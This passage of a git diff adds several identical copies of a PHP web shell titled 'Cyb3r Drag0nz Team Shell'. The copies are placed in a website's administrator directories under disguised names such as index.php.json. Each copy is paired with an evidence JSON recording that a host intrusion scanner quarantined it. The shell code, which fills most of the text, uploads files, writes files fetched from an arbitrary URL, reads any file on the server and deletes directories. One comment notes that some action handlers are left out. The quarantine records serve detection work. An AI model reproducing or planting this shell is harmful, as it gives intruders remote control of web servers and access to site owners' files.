'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..b4ba718 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5115", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/cache/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353221, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/cache/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..049a3cc --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5117", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/components/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353222, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/components/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..55ea600 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5099", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353220, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/index.php.json b/var/www/hosting/archlinexp.eu/www/administrator/index.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/index.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/index.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/index.php.json.evidence.json new file mode 100644 index 0000000..066e90c --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/index.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5100", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/index.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381496, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/index.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json b/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json.evidence.json new file mode 100644 index 0000000..ebcb0fc --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5104", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/ko6h7s5e9kak.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381494, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/ko6h7s5e9kak.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..20fa1aa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5116", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/language/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353230, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/language/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json b/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

